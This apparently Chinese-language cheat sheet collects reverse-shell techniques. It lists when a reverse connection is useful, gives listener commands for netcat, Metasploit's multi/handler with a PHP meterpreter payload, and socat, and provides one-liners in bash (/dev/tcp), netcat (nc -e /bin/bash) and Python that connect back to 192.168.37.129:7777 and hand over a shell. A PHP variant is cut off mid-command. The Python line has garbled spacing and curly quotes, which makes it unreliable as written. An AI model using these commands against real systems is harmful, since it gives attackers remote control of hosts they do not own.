反弹连接适应情况
- 没有安装HTTP Server或找不到网站目录
- 内网,私有IP
- IP动态变化
- 6379端口不允许入方向
- 一句话木马被删除
常见端口监听方式
- netcat:nc -lvp 7777
- msf:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.37.130
set lport 7777
run - socat:socat TCP-LISTEN:7777 - (kali系统)
建立反弹连接方式
- Linux bash:
bash -i >& /dev/tcp/192.168.37.129/7777 0>&1 - netcat:
nc -e /bin/bash 192.168.37.129 7777 - Python:
python - c “import os,socket,subprocess;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.37.129’,7777));os.dup2(s.fileno(),0);os.du p2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’- i’]);” - PHP:
1)php -r ‘exe